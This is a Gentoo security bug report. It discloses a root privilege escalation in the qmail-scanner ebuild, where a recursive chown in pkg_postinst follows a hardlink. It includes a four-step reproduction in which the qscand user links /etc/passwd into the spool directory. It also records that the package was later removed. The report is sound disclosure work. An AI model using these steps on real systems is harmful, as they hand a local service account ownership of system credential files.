Gentoo Websites Logo
Go to: Gentoo Home Documentation Forums Lists Bugs Planet Store Wiki Get Gentoo!
Bug 630902 - mail-filter/qmail-scanner: root privilege escalation via "chown -R" in pkg_postinst
Summary: mail-filter/qmail-scanner: root privilege escalation via "chown -R" in pkg_po...
Status: RESOLVED OBSOLETE
Alias: None
Product: Gentoo Security
Classification: Unclassified
Component: Auditing (show other bugs)
Hardware: All Linux
: Normal normal (vote)
Assignee: Gentoo Security
URL:
Whiteboard:
Keywords:
Depends on:
Blocks:
 
Reported: 2017-09-13 16:29 UTC by Michael Orlitzky
Modified: 2020-04-03 23:25 UTC (History)
6 users (show)

See Also:
Package list:
Runtime testing required: ---

Attachments
Add an attachment (proposed patch, testcase, etc.)

Note You need to log in before you can comment on or make changes to this bug.
Description Michael Orlitzky gentoo-dev 2017-09-13 16:29:19 UTC 
The ebuilds for qmail-scanner call "chown -R" in pkg_postinst:

  pkg_postinst () {
      einfo "Fixing ownerships"
      chown -R qscand:qscand /var/spool/qscan
      ...

This can be exploited by the "qscand" user to gain root, if he places a link in /var/spool/qscand and if the user upgrades or reinstalls the package. For example,

  1. emerge qmail-scanner
  2. su -s /bin/sh -c 'ln /etc/passwd /var/spool/qscan/x' qscand
  3. emerge qmail-scanner
  4. /etc/passwd is owned by qscand
Comment 1 Michael Orlitzky gentoo-dev 2019-09-14 16:31:56 UTC 
This package was removed a year and a half ago:

commit ec7079c0c95dd1dac40e7b67fba9383a5498dcb8
Author: Pacho Ramos <pacho@gentoo.org>
Date:   Sun Apr 29 20:13:13 2018 +0200

    Remove masked for removal package

 mail-filter/qmail-scanner/Manifest                 |   8 -
 .../files/qmail-scanner-2.05.logrotate             |   4 -
 .../files/qmail-scanner-2.06.logrotate             |   4 -
 .../qmail-scanner-2.08-disable-suid-check.patch    |  17 --
 .../files/qmail-scanner-2.08.logrotate             |   4 -
 .../qmail-scanner/files/qmailscanner.cronjob       |   2 -
 .../qmail-scanner/files/qmailscanner.logrotate     |   4 -
 mail-filter/qmail-scanner/metadata.xml             |  15 --
 .../qmail-scanner/qmail-scanner-1.25-r1.ebuild     | 163 -----------------
 .../qmail-scanner/qmail-scanner-2.05.ebuild        | 190 --------------------
 .../qmail-scanner/qmail-scanner-2.06.ebuild        | 193 --------------------
 .../qmail-scanner/qmail-scanner-2.08.ebuild        | 194 ---------------------
 12 files changed, 798 deletions(-)
Comment 2 Robin Johnson archtester Gentoo Infrastructure gentoo-dev Security 2020-04-03 23:25:31 UTC 
unrestricting and re-assigning per bug 705894